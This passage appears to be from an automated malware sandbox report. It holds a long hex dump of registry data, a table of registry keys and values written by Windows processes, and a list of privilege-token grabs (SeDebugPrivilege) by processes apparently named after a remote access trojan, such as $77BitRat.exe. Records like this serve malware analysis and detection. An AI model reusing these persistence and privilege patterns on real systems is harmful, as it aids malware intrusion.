ffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060606060a0a0a0a00000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000060606060ffffffff60606060000000000000000030303030868686869999999999999999999999999999999999999999999999999999999999999999babababaffffffff60606060303030300a0a0a0a3c3c3c3c9e9e9e9e9999999999999999999999999999999999999999999999999999999999999999babababaffffffff606060603a3a3a3a999999996b6b6b6b464646467d7d7d7d8c8c8c8ca6a6a6a69999999999999999999999999999999999999999babababaffffffff606060603a3a3a3aa6a6a6a69b9b9b9b7d7d7d7d6666666666666666666666666c6c6c6c8c8c8c8c9b9b9b9b9b9b9b9b99999999babababaffffffff60606060404040409f9f9f9f8e8e8e8e808080808080808066666666666666666666666666666666666666666666666684848484b7b7b7b7ffffffff606060603030303097979797808080808080808080808080787878785a5a5a5a66666666666666666666666666666666666666669c9c9c9cffffffff606060602626262687878787808080808080808080808080808080802828282820202020666666666666666666666666666666669c9c9c9cffffffff606060601d1d1d1d4d4d4d4d535353536a6a6a6a6b6b6b6b40404040101010100000000000000000202020205a5a5a5a69696969a0a0a0a0ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d3a3a3a3a00000000000000000000000000000000000000000000000063636363ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d484848480e0e0e0e000000000000000000000000000000000000000060606060ffffffff606060600a0a0a0a4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d444444440e0e0e0e000000000000000000000000000000000000000000000000a0a0a0a06060606000000000000000000000000013131313131313130e0e0e0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056565678888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c33333348888888bf6f6f6f9b2b2b2b3c888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf6a6a6a953737374d888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf808080b4888888bf888888bf808080b30909090c6c6c6c97888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf787878a8111111186f6f6f9c888888bf888888bf5e5e5e831010101711111118888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c000000000909090c4d4d4d6c888888bf888888bf888888bf101010176363638b888888bf888888bf888888bf828282b65c5c5c81696969934545456000000000000000000000000011111118888888bf888888bf888888bf6f6f6f9b0808080b4242425d4f4f4f6e4c4c4c6b111111182222222f1515151e000000000000000000000000000000000000000067676790888888bf888888bf888888bf838383b96a6a6a956666668f6666668f777777a7888888bf3c3c3c5400000000000000000000000000000000000000000909090c565656786767679056565678808080b4888888bf888888bf888888bf888888bf808080b40909090c0000000000000000000000000000000000000000000000000000000000000000000000001a1a1a24787878a8888888bf888888bf676767901a1a1a24000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400200000100010000000000000900000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe0000
00000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000f0410000c00000008190000093800000138400000000000033c1000077fe000077ee000033cc00000000000013c8000093c9000081810000c0030000f00f0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000fff100008000000000000000000000000000000000000000000000000001000080070000e0070000c00f0000ce3f0000ffff0000ffff0000ffff0000ffff0000ffff0000ffff0000f00000000000000000000000
00000000000100000003000080070000c0070000c0070000fc0f0000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff00000000000000000000000000000000000000000000000001000000080000001800000007000000d4000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{54877B69-094E-46DB-BBD6-85AB58A41C20} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065036373276371" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
